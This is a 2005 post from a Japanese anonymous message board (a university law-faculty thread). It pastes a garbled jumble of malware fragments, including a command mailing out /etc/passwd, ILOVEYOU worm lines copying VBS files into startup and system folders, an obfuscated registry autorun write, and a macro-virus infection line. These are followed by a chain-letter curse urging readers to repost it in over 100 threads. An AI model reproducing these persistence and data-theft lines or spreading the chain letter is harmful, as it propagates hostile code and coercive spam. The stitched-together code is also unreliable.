したらばTOP ■掲示板に戻る■ 全部 1-100 最新50 | |
レス数が1スレッドの最大レス数(1000件)を超えています。残念ながら投稿することができません。

■■法学部スレッド■■

3946名無しの神大生:2005/06/22(水) 01:30:26
cat /etc/passwd | mail nobody kak.hta';ken=wd+'START ms-its:mhtml:file://c:\

fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

これなんか反応するんですけど・・・
怖いので教えてください。チェーンメールですか?
これ見た人は100個以上のスレにコピペして貼らなきゃ
あなたと好きな人が呪われるって聞いたので
ごめんなさい・・・。ここに貼らせていただきます・・・
悪気はないんです。怖いんです・・・
このサイトで個人名晒されて悪口かかれて、それを原因に
自殺した事件があったらしいんですけど、その呪いと言われました。。
どうしてくれるんですか!
呪われたくないんです
怖いので言われたとおりにします・・・

カウント57328905764892

掲示板管理者へ連絡 無料レンタル掲示板